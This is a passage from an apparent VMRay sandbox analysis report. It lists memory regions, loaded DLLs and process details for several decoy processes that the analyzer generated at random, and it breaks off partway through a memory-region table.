| pagefile_0x0000000000590000 | 0x00590000 | 0x00590fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000005a0000 | 0x005a0000 | 0x005a1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x005b0000 | 0x0066dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000670000 | 0x00670000 | 0x00670fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000680000 | 0x00680000 | 0x0068ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000006d0000 | 0x006d0000 | 0x00787fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000790000 | 0x00790000 | 0x00793fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000007a0000 | 0x007a0000 | 0x0089ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000009a0000 | 0x009a0000 | 0x00b27fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000b30000 | 0x00b30000 | 0x00cb0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000cc0000 | 0x00cc0000 | 0x00ccffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000cd0000 | 0x00cd0000 | 0x00d0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d10000 | 0x00d10000 | 0x00e0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e20000 | 0x00e20000 | 0x00e2ffff | Private Memory | rw |
|
|
|
- |
| uni-likely-strap.exe | 0x01160000 | 0x01176fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001180000 | 0x01180000 | 0x0257ffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x74c00000 | 0x74c1cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74c20000 | 0x74c94fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x74ca0000 | 0x74d30fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f940000 | 0x7f940000 | 0x7fa3ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007fa40000 | 0x7fa40000 | 0x7fa62fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007fa65000 | 0x7fa65000 | 0x7fa67fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fa6b000 | 0x7fa6b000 | 0x7fa6dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fa6e000 | 0x7fa6e000 | 0x7fa6efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fa6f000 | 0x7fa6f000 | 0x7fa6ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #85: turkey.exe
0
0
| Information | Value |
|---|---|
| ID | #85 |
| File Name | c:\program files\microsoft office\turkey.exe |
| Command Line | "C:\Program Files\Microsoft Office\turkey.exe" |
| Initial Working Directory | C:\Program Files\Microsoft Office\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb90 |
| Parent PID | 0x508 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
C8C
0x
6B8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| turkey.exe | 0x00990000 | 0x009a6fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000dc0000 | 0x00dc0000 | 0x00dcffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000dd0000 | 0x00dd0000 | 0x00dd3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000de0000 | 0x00de0000 | 0x00de0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000df0000 | 0x00df0000 | 0x00e03fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000e10000 | 0x00e10000 | 0x00e4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e50000 | 0x00e50000 | 0x00f4ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000f50000 | 0x00f50000 | 0x00f53fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000f60000 | 0x00f60000 | 0x00f60fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000f70000 | 0x00f70000 | 0x00f71fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00f80000 | 0x0103dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001080000 | 0x01080000 | 0x01080fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001090000 | 0x01090000 | 0x01093fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000010a0000 | 0x010a0000 | 0x010dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000010f0000 | 0x010f0000 | 0x010fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001230000 | 0x01230000 | 0x0132ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001330000 | 0x01330000 | 0x014b7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000014c0000 | 0x014c0000 | 0x01577fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001580000 | 0x01580000 | 0x0158ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001590000 | 0x01590000 | 0x01710fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001720000 | 0x01720000 | 0x02b1ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002b20000 | 0x02b20000 | 0x02c1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ce0000 | 0x02ce0000 | 0x02ceffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x74c00000 | 0x74c1cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74c20000 | 0x74c94fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x74ca0000 | 0x74d30fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e250000 | 0x7e250000 | 0x7e34ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007e350000 | 0x7e350000 | 0x7e372fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e373000 | 0x7e373000 | 0x7e373fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e375000 | 0x7e375000 | 0x7e377fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e37b000 | 0x7e37b000 | 0x7e37bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e37d000 | 0x7e37d000 | 0x7e37ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #86: comfortable_welsh.exe
0
0
| Information | Value |
|---|---|
| ID | #86 |
| File Name | c:\program files (x86)\windows mail\comfortable_welsh.exe |
| Command Line | "C:\Program Files (x86)\Windows Mail\comfortable_welsh.exe" |
| Initial Working Directory | C:\Program Files (x86)\Windows Mail\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x8c4 |
| Parent PID | 0x508 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
C88
0x
A0C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000a10000 | 0x00a10000 | 0x00a1ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000a20000 | 0x00a20000 | 0x00a23fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a30000 | 0x00a30000 | 0x00a30fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000a40000 | 0x00a40000 | 0x00a53fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000a60000 | 0x00a60000 | 0x00a9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000aa0000 | 0x00aa0000 | 0x00b9ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000ba0000 | 0x00ba0000 | 0x00ba3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000bb0000 | 0x00bb0000 | 0x00bb0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000bc0000 | 0x00bc0000 | 0x00bc1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c10000 | 0x00c10000 | 0x00c10fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000c20000 | 0x00c20000 | 0x00c23fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000c40000 | 0x00c40000 | 0x00c4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c50000 | 0x00c50000 | 0x00c8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c90000 | 0x00c90000 | 0x00c9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000cc0000 | 0x00cc0000 | 0x00dbffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00dc0000 | 0x00e7dfff | Memory Mapped File | r |
|
|
|
- |
| comfortable_welsh.exe | 0x00ee0000 | 0x00ef6fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001000000 | 0x01000000 | 0x01187fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001190000 | 0x01190000 | 0x01310fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001320000 | 0x01320000 | 0x0271ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002720000 | 0x02720000 | 0x027d7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000027e0000 | 0x027e0000 | 0x028dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002910000 | 0x02910000 | 0x0291ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x74c00000 | 0x74c1cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74c20000 | 0x74c94fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x74ca0000 | 0x74d30fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f9a0000 | 0x7f9a0000 | 0x7fa9ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007faa0000 | 0x7faa0000 | 0x7fac2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007fac4000 | 0x7fac4000 | 0x7fac6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fac7000 | 0x7fac7000 | 0x7fac7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007facc000 | 0x7facc000 | 0x7facefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007facf000 | 0x7facf000 | 0x7facffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #87: immediate.exe
0
0
| Information | Value |
|---|---|
| ID | #87 |
| File Name | c:\program files\msbuild\immediate.exe |
| Command Line | "C:\Program Files\MSBuild\immediate.exe" |
| Initial Working Directory | C:\Program Files\MSBuild\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x968 |
| Parent PID | 0x508 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
C84
0x
734
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x00290fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002a0000 | 0x002a0000 | 0x002a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| immediate.exe | 0x002c0000 | 0x002d6fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000320000 | 0x00320000 | 0x0035ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000560000 | 0x00560000 | 0x0065ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000660000 | 0x00660000 | 0x007e7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007f0000 | 0x007f0000 | 0x00970fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000990000 | 0x00990000 | 0x0099ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000009a0000 | 0x009a0000 | 0x01d9ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001da0000 | 0x01da0000 | 0x01e57fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001e60000 | 0x01e60000 | 0x01f5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001f60000 | 0x01f60000 | 0x01f6ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x74c00000 | 0x74c1cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74c20000 | 0x74c94fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x74ca0000 | 0x74d30fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ebc0000 | 0x7ebc0000 | 0x7ecbffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ecc0000 | 0x7ecc0000 | 0x7ece2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ece4000 | 0x7ece4000 | 0x7ece6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ece7000 | 0x7ece7000 | 0x7ece7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ece8000 | 0x7ece8000 | 0x7ece8fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eced000 | 0x7eced000 | 0x7eceffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #88: unlimited-victims.exe
0
0
| Information | Value |
|---|---|
| ID | #88 |
| File Name | c:\program files (x86)\mozilla firefox\unlimited-victims.exe |
| Command Line | "C:\Program Files (x86)\Mozilla Firefox\unlimited-victims.exe" |
| Initial Working Directory | C:\Program Files (x86)\Mozilla Firefox\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x8d8 |
| Parent PID | 0x508 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
C80
0x
8D0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000b60000 | 0x00b60000 | 0x00b6ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000b70000 | 0x00b70000 | 0x00b73fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b80000 | 0x00b80000 | 0x00b80fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000b90000 | 0x00b90000 | 0x00ba3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000bb0000 | 0x00bb0000 | 0x00beffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000bf0000 | 0x00bf0000 | 0x00ceffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000cf0000 | 0x00cf0000 | 0x00cf3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000d00000 | 0x00d00000 | 0x00d00fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000d10000 | 0x00d10000 | 0x00d11fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00d20000 | 0x00dddfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000e20000 | 0x00e20000 | 0x00e20fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000e30000 | 0x00e30000 | 0x00e33fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000e60000 | 0x00e60000 | 0x00e6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f70000 | 0x00f70000 | 0x00faffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001000000 | 0x01000000 | 0x010fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001100000 | 0x01100000 | 0x01287fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001290000 | 0x01290000 | 0x01347fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000013b0000 | 0x013b0000 | 0x013bffff | Private Memory | rw |
|
|
|
- |
| unlimited-victims.exe | 0x013c0000 | 0x013d6fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00000000013e0000 | 0x013e0000 | 0x014dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001520000 | 0x01520000 | 0x0152ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001530000 | 0x01530000 | 0x016b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000016c0000 | 0x016c0000 | 0x02abffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x74c00000 | 0x74c1cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74c20000 | 0x74c94fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x74ca0000 | 0x74d30fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
